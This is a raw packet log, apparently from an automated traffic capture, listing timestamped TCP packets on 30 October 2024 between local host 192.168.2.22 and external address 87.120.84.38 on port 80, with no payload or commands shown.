Oct 30, 2024 08:25:04.415570021 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.415581942 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.415581942 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.415600061 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.415620089 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.415643930 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.415692091 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.415704966 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.415719032 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.415745020 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.415750980 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.415756941 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.415785074 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.415796995 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.415816069 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.415827990 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.415838957 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.415865898 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.415874004 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.415899992 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.415911913 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.415923119 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.415935040 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.415946007 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.415962934 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.415972948 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.416002035 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.416014910 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.416057110 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.416102886 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.416121006 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.416136980 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.416146994 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.416150093 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.416158915 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.416168928 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.416178942 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.416193008 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.416203022 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.416203976 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.416229010 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.416233063 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.416244030 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.416246891 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.416276932 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.416457891 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.416470051 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.416507006 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.416554928 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.416568041 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.416578054 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.416589975 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.416600943 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.416601896 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.416620970 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.416632891 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.416642904 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.416654110 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.416663885 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.416676044 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.416691065 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.416701078 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.416719913 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.416765928 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.416779041 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.416790009 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.416800976 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.416815042 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.416816950 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.416824102 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.416843891 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.416855097 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.416908979 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.416919947 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.416929007 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.416943073 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.416954994 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.416955948 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.416968107 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.416971922 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.416990042 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.416990042 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417004108 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417010069 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.417020082 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417027950 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.417042017 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.417062044 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.417083979 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417095900 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417104959 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417115927 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417130947 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.417143106 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.417161942 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.417180061 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417191982 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417202950 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417227030 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.417237997 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.417277098 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417289972 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417300940 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417316914 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417323112 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.417341948 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.417360067 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.417437077 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417448997 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417459011 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417469978 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417484045 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417490959 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.417495966 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417510986 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.417522907 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.417542934 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.417572021 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417583942 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417594910 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417606115 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417618036 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417623043 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.417629957 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.417670012 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.417670012 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.417695045 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417706966 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417745113 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.417776108 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417788982 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417799950 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417812109 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417824030 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.417831898 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417840958 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.417844057 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417855978 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.417856932 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417867899 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.417870045 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417891026 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.417901039 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.417922974 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417934895 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417946100 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417958021 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.417970896 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.417980909 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.417999029 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.418097973 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.418109894 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.418147087 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.418394089 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.418442011 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.418473959 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.418484926 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.418494940 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.418507099 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.418519974 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.418533087 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.418551922 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.418621063 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.418632030 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.418642998 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.418669939 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.418680906 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.418693066 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.418705940 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.418715954 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.418728113 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.418735027 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.418740988 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.418752909 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.418768883 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.418884993 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.418915987 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.418926001 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.418953896 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.418956995 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.418965101 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.418977022 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.418998003 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.419121027 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.419132948 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.419143915 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.419152021 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.419154882 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.419167995 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.419172049 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.419179916 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.419190884 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.419203997 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.419204950 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.419213057 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.419215918 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.419229031 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.419235945 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.419255018 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.419264078 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.419358969 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.419446945 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.419471025 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.419488907 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.419495106 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.419502974 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.419513941 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.419523954 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.419528961 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.419538021 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.419547081 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.419549942 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.419560909 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.419564962 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.419573069 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.419584036 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.419585943 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.419598103 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.419616938 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.419625044 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.419722080 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.438150883 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.438191891 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.438201904 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.438224077 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.438246012 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.582618952 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.582632065 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.582642078 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.582653999 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.582664967 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.582678080 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.582856894 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.582856894 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.582909107 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.582921028 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.582958937 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.583101034 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583112001 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583122015 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583133936 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583146095 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583148003 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.583158016 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583167076 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.583169937 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583174944 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.583180904 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583187103 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583193064 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583194017 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.583201885 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583225012 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.583240032 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.583336115 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583345890 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583359957 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583370924 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583379984 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583384037 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.583389997 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583398104 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.583401918 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583411932 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583421946 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.583425045 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583435059 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583441019 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.583441019 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.583446980 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583456993 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583460093 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.583468914 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.583472967 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583484888 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583494902 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583496094 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.583503962 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583517075 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.583517075 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.583518028 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583527088 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583528042 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.583548069 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.583565950 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.583597898 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583662033 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.583689928 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583699942 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583724976 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583734035 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.583736897 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583746910 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583776951 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.583791018 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.583841085 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583852053 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583859921 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583869934 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583878994 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583887100 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.583890915 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583903074 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.583914042 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.583934069 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.583976030 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.583986044 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.584026098 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.584072113 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.584089041 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.584098101 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.584114075 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.584117889 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.584124088 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.584140062 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.584141970 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.584148884 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.584157944 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.584165096 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.584170103 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.584187984 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.584203005 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.584214926 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.584245920 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.584247112 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.584254026 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.584270000 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.584280014 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.584280968 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.584291935 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.584314108 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.584341049 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.584461927 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.584477901 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.584489107 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.584511995 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.584522963 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.584599018 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.584610939 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.584620953 CET	80	49163	87.120.84.38	192.168.2.22
